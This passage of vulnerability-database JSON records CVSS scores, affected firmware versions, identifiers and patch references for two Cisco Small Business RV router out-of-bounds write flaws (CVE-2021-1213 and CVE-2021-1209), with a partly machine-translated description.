"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "VHN-374267", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2021-1213", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 2.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.2, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2021-1213", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "High", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-1213", "trust": 1.0, "value": "HIGH" }, { "author": "ykramarz@cisco.com", "id": "CVE-2021-1213", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2021-1213", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2021-41174", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202101-969", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-374267", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2021-1213", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41174" }, { "db": "VULHUB", "id": "VHN-374267" }, { "db": "VULMON", "id": "CVE-2021-1213" }, { "db": "JVNDB", "id": "JVNDB-2021-002634" }, { "db": "CNNVD", "id": "CNNVD-202101-969" }, { "db": "NVD", "id": "CVE-2021-1213" }, { "db": "NVD", "id": "CVE-2021-1213" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers", "sources": [ { "db": "NVD", "id": "CVE-2021-1213" }, { "db": "JVNDB", "id": "JVNDB-2021-002634" }, { "db": "CNVD", "id": "CNVD-2021-41174" }, { "db": "VULHUB", "id": "VHN-374267" }, { "db": "VULMON", "id": "CVE-2021-1213" } ], "trust": 2.34 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-1213", "trust": 3.2 }, { "db": "JVNDB", "id": "JVNDB-2021-002634", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2021-41174", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2021.0232", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0142", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202101-969", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-374267", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2021-1213", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41174" }, { "db": "VULHUB", "id": "VHN-374267" }, { "db": "VULMON", "id": "CVE-2021-1213" }, { "db": "JVNDB", "id": "JVNDB-2021-002634" }, { "db": "CNNVD", "id": "CNNVD-202101-969" }, { "db": "NVD", "id": "CVE-2021-1213" } ] }, "id": "VAR-202101-0819", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-41174" }, { "db": "VULHUB", "id": "VHN-374267" } ], "trust": 1.4114631585714283 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41174" } ] }, "last_update_date": "2024-11-23T21:34:59.473000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-overflow-WUnUgv4U", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U" }, { "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W remote command execution and denial of service vulnerability (CNVD-2021-41174)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/272311" }, { "title": "Multiple Cisco Product Buffer Error Vulnerability Fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139512" }, { "title": "Cisco: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Remote Command Execution and Denial of Service Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-overflow-WUnUgv4U" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41174" }, { "db": "VULMON", "id": "CVE-2021-1213" }, { "db": "JVNDB", "id": "JVNDB-2021-002634" }, { "db": "CNNVD", "id": "CNNVD-202101-969" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "Out-of-bounds writing (CWE-787) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-374267" }, { "db": "JVNDB", "id": "JVNDB-2021-002634" }, { "db": "NVD", "id": "CVE-2021-1213" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-overflow-wunugv4u" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1213" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0142/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0232/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/787.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41174" }, { "db": "VULHUB", "id": "VHN-374267" }, { "db": "VULMON", "id": "CVE-2021-1213" }, { "db": "JVNDB", "id": "JVNDB-2021-002634" }, { "db": "CNNVD", "id": "CNNVD-202101-969" }, { "db": "NVD", "id": "CVE-2021-1213" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2021-41174" }, { "db": "VULHUB", "id": "VHN-374267" }, { "db": "VULMON", "id": "CVE-2021-1213" }, { "db": "JVNDB", "id": "JVNDB-2021-002634" }, { "db": "CNNVD", "id": "CNNVD-202101-969" }, { "db": "NVD", "id": "CVE-2021-1213" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41174" }, { "date": "2021-01-13T00:00:00", "db": "VULHUB", "id": "VHN-374267" }, { "date": "2021-01-13T00:00:00", "db": "VULMON", "id": "CVE-2021-1213" }, { "date": "2021-09-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-002634" }, { "date": "2021-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-969" }, { "date": "2021-01-13T22:15:19.927000", "db": "NVD", "id": "CVE-2021-1213" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41174" }, { "date": "2021-01-15T00:00:00", "db": "VULHUB", "id": "VHN-374267" }, { "date": "2021-01-15T00:00:00", "db": "VULMON", "id": "CVE-2021-1213" }, { "date": "2021-09-28T07:26:00", "db": "JVNDB", "id": "JVNDB-2021-002634" }, { "date": "2021-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-969" }, { "date": "2024-11-21T05:43:50.577000", "db": "NVD", "id": "CVE-2021-1213" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-969" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Out-of-bounds write vulnerability in routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-002634" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-969" } ], "trust": 0.6 } }
var-202101-0815
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0815", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "application extension platform", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "cisco rv130w wireless-n multifunction vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "application extension platform", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv110w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv215w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41178" }, { "db": "JVNDB", "id": "JVNDB-2021-002643" }, { "db": "NVD", "id": "CVE-2021-1209" } ] }, "cve": "CVE-2021-1209", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2021-1209", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CNVD-2021-41178", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "VHN-374263", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2021-1209", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 2.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.2, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2021-1209", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "High", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-1209", "trust": 1.0, "value": "HIGH" }, { "author": "ykramarz@cisco.com", "id": "CVE-2021-1209", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2021-1209", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2021-41178", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202101-974", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-374263", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2021-1209", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41178" }, { "db": "VULHUB", "id": "VHN-374263" }, { "db": "VULMON", "id": "CVE-2021-1209" }, { "db": "JVNDB", "id": "JVNDB-2021-002643" }, { "db": "CNNVD", "id": "CNNVD-202101-974" }, { "db": "NVD", "id": "CVE-2021-1209" }, { "db": "NVD", "id": "CVE-2021-1209" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers", "sources": [ { "db": "NVD", "id": "CVE-2021-1209" }, { "db": "JVNDB", "id": "JVNDB-2021-002643" }, { "db": "CNVD", "id": "CNVD-2021-41178" }, { "db": "VULHUB", "id": "VHN-374263" }, { "db": "VULMON", "id": "CVE-2021-1209" } ], "trust": 2.34 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-1209", "trust": 3.2 }, { "db": "JVNDB", "id": "JVNDB-2021-002643", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2021-41178", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2021.0232", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.0142", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202101-974", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-374263", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2021-1209", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41178" }, { "db": "VULHUB", "id": "VHN-374263" }, { "db": "VULMON", "id": "CVE-2021-1209" }, { "db": "JVNDB", "id": "JVNDB-2021-002643" }, { "db": "CNNVD", "id": "CNNVD-202101-974" }, { "db": "NVD", "id": "CVE-2021-1209" } ] }, "id": "VAR-202101-0815", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-41178" }, { "db": "VULHUB", "id": "VHN-374263" } ], "trust": 1.4114631585714283 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41178" } ] }, "last_update_date": "2024-11-23T21:34:59.106000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-rv-overflow-WUnUgv4U", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U" }, { "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W remote command execution and denial of service vulnerability (CNVD-2021-41178)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/272331" }, { "title": "Multiple Cisco Product Buffer Error Vulnerability Fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139515" }, { "title": "Cisco: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Remote Command Execution and Denial of Service Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-overflow-WUnUgv4U" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41178" }, { "db": "VULMON", "id": "CVE-2021-1209" }, { "db": "JVNDB", "id": "JVNDB-2021-002643" }, { "db": "CNNVD", "id": "CNNVD-202101-974" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "Out-of-bounds writing (CWE-787) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-374263" }, { "db": "JVNDB", "id": "JVNDB-2021-002643" }, { "db": "NVD", "id": "CVE-2021-1209" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-overflow-wunugv4u" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1209" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0142/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.0232/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/787.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41178" }, { "db": "VULHUB", "id": "VHN-374263" }, { "db": "VULMON", "id": "CVE-2021-1209" }, { "db": "JVNDB", "id": "JVNDB-2021-002643" }, { "db": "CNNVD", "id": "CNNVD-202101-974" }, { "db": "NVD", "id": "CVE-2021-1209" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2021-41178" }, { "db": "VULHUB", "id": "VHN-374263" }, { "db": "VULMON", "id": "CVE-2021-1209" }, { "db": "JVNDB", "id": "JVNDB-2021-002643" }, { "db": "CNNVD", "id": "CNNVD-202101-974" }, { "db": "NVD", "id": "CVE-2021-1209" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41178" }, { "date": "2021-01-13T00:00:00", "db": "VULHUB", "id": "VHN-374263" }, { "date": "2021-01-13T00:00:00", "db": "VULMON", "id": "CVE-2021-1209" }, { "date": "2021-09-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-002643" }, { "date": "2021-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-974" }, { "date": "2021-01-13T22:15:19.630000", "db": "NVD", "id": "CVE-2021-1209" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2021-41178" }, { "date": "2021-01-15T00:00:00", "db": "VULHUB", "id": "VHN-374263" }, { "date": "2021-01-15T00:00:00", "db": "VULMON", "id": "CVE-2021-1209" }, { "date": "2021-09-28T08:19:00", "db": "JVNDB", "id": "JVNDB-2021-002643" }, { "date": "2021-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-202101-974" }, { "date": "2024-11-21T05:43:50", "db": "NVD", "id": "CVE-2021-1209" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-974" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Out-of-bounds write vulnerability in routers", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-002643" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202101-974" } ], "trust": 0.6 } }
var-202101-0833
Vulnerability from variot
